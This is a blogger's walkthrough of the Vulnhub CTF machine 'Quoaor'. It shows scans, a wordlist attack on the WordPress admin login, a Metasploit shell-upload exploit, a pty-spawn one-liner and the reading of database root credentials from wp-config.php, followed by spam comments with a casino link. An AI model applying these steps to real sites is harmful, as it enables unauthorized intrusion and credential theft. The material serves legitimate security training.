Vulnhub: Quoaor – CTF
Hello Cyberman!
This article subject CTF (Capture The Flag). This vulnerability machine is name “Quoaor”.
And this CTF is level 1. This machine as Ubuntu. And it is a OS.
If you want download please click it.
I be honest. I hated this machine. The has very easy solutions but I went try hard solutions.
If you are ready, okay we start.
First, I scanned with Nmap like every time. I find IP address of machine.
I used command in terminal like below:
$ nmap 192.168.0/16
Then I find machine ip address. This machine IP address: 192.168.1.20. Okay, now I run command in terminal like below for learning which running service this machine:
$ nmap 192.168.1.20 -Pn -sV -A
And I get result like below:
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.20 -Pn -sV -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-02 14:14 EDT
Nmap scan report for Quaoar.home (192.168.1.20)
Host is up (0.00063s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
| 2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_ 256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp open domain ISC BIND 9.8.1-P1
| dns-nsid:
|_ bind.version: 9.8.1-P1
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3?
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_pop3-capabilities: RESP-CODES UIDL STLS CAPA TOP SASL PIPELINING
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_imap-capabilities: ENABLE IDLE more post-login STARTTLS SASL-IR capabilities LOGIN-REFERRALS Pre-login OK ID LOGINDISABLEDA0001 listed IMAP4rev1 have LITERAL+
445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_imap-capabilities: ENABLE IDLE post-login more ID SASL-IR LOGIN-REFERRALS capabilities Pre-login AUTH=PLAINA0001 OK listed IMAP4rev1 have LITERAL+
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Not valid before: 2016-10-07T04:32:43
|_Not valid after: 2026-10-07T04:32:43
|_pop3-capabilities: RESP-CODES UIDL SASL(PLAIN) CAPA TOP USER PIPELINING
|_ssl-date: 2022-11-02T18:17:35+00:00; -2s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 39m58s, deviation: 1h37m59s, median: -2s
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.6.3)
| Computer name: Quaoar
| NetBIOS computer name:
| Domain name: home
| FQDN: Quaoar.home
|_ System time: 2022-11-02T14:17:27-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.27 seconds
zsh: segmentation fault nmap 192.168.1.20 -Pn -sV -A
And now, I learned this is a website. I wrote in url area in Firefox Browser. And looked this website.
Then I clicked on the article “Click here to know what you need to do”.
This showed a picture for me. This picture like below:
Okay, I got in idea. Then I thinked like “This is a picture and maybe, has the info!”. And I wanted to see if there is a hidden file inside the picture. But not has. How to do it If you be curious, I showing.
Firstly, you need know it: Steganography. Please clicked for learning. If you enough idea, okay. There are a tools for steganography. It is name: Steghide. Please click for detail. Then I do tested with steghide. And I found. Yep, there is a file but with this is a password. If you know password, okay enter to password and take it a file. But you dont knowing password you cant get it file.
I downloaded picture and I entered command to terminal like below:
$ steghide info Hack_The_Planet.jpg
Then result like below:
Then I searched in Google. “How to crack in steghide?”. And I learned a tools. Its is name: “Stegcracker”. This tools used to a wordlist and try all password in wordlist.
For example, I tried a example:
I tried long time but nope. I can’t crack.. And I even tried wordlist named rockyou.txt. 🙁 Then again a I started and scanned this website with nikto.
┌──(kali㉿kali)-[~]
└─$ nikto -h 192.168.1.20
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.20
+ Target Hostname: 192.168.1.20
+ Target Port: 80
+ Start Time: 2022-11-02 14:28:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 00:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8727 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2022-11-02 14:28:42 (GMT-4) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto given to result like above. And I seen a word like gold! WORDPRESS… Then I went to url address: “http://192.168.1.20/wordpress/“.
Finally, I found a website. And then scanned with dirb. (Dirb: Website is scanner. This tool look at the sub directory.) But I dont found not enough result. I scanned this wordpress with WPScan tool.
Then I get result like below:
┌──(kali㉿kali)-[~/Desktop/Quoaor]
└─$ wpscan --url http://192.168.1.20/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.1.20/wordpress/ [192.168.1.20]
[+] Started: Thu Nov 10 15:42:27 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.2.22 (Ubuntu)
| - X-Powered-By: PHP/5.3.10-1ubuntu3
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.20/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.1.20/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.20/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.1.20/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 3.9.39 identified (Outdated, released on 0001-01-01).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.20/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=3.9.39</generator>
| - http://192.168.1.20/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=3.9.39</generator>
[+] WordPress theme in use: twentyfourteen
| Location: http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| [!] The version is out of date, the latest version is 3.5
| Style URL: http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.39
| Style Name: Twenty Fourteen
| Style URI: http://wordpress.org/themes/twentyfourteen
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
| Author: the WordPress team
| Author URI: http://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.20/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.39, Match: 'Version: 1.1'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: http://192.168.1.20/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.20/wordpress/wp-content/plugins/mail-masta/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Nov 10 15:42:30 2022
[+] Requests Done: 186
[+] Cached Requests: 5
[+] Data Sent: 48.925 KB
[+] Data Received: 12.298 MB
[+] Memory used: 243.664 MB
[+] Elapsed time: 00:00:03
Okay now, I learned. There is a username is admin. Then now, I crack it user. I need tool a wordlist. I choose a ready wordlist name is john.lst.
I entered to command in terminal:
$ wpscan --url http://192.168.1.20/wordpress/ --passwords /usr/share/wordlists/john.lst
Perfect result! I found a admin user and his password. Username: admin, password: admin.
Is it a joke? Anyways.
I entered WordPress admin panel with admin user. And I discovered this panel. Then run msfconsole in terminal .
I love it this framework. Then I searched a exploit in msfconsole. I entered command like below:
msf6 > grep shell search wordpress
Then I found a two result.
- 20 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
- 70 exploit/unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload
And I used exploit of number 20. It is name: exploit/unix/webapp/wp_admin_shell_upload
Result like above picture. And it want a bit parameters. For example: username, password, Rhosts etc.
I filled in the required fields.
And I ran it with the “run” command.
And now, I’m inside. I entered go to terminal with “shell” command. Then for direct run in terminal I entered run this command: python -c ‘import pty;pty.spawn(“bin/bash”)’
Okay now, I searched in machine terminal with www-data user. And wp-config.php file for I went to path “/var/www/”. Then I read the wp-config file with the “cat” command. As seen in the picture below:
Most important info! There is a root user info. I used this info. This info like below:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
User: root
Password: rootpassword!
I used this info and I entered this machine with root user in SSH.
And… Finally! I capture the flag.
Have a nice day with lots of informatics. 🙂
Very nice post. I just stumbled upon your blog and wanted to say that I’ve really enjoyed browsing your blog posts. In any case I’ll be subscribing to your feed and I hope you write again soon!
Sweet blog! I found it while searchinbg on Yahoo News. Do you have any suggestions on how to
get listed in Yahoo News? I’ve been trying for a while but I never seem to
get there! Thanks https://telegra.ph/7-Smartest-Strategies-to-Maximize-your-Winning-in-Online-Casinos-05-09
Sweet blog! I found it while searching on Yahoo News.
Do you haqve any suggestions on how to gett listed in Yahoo News?
I’ve been trying for a while but I never
seem to get there! Thanks https://telegra.ph/7-Smartest-Strategies-to-Maximize-your-Winning-in-Online-Casinos-05-09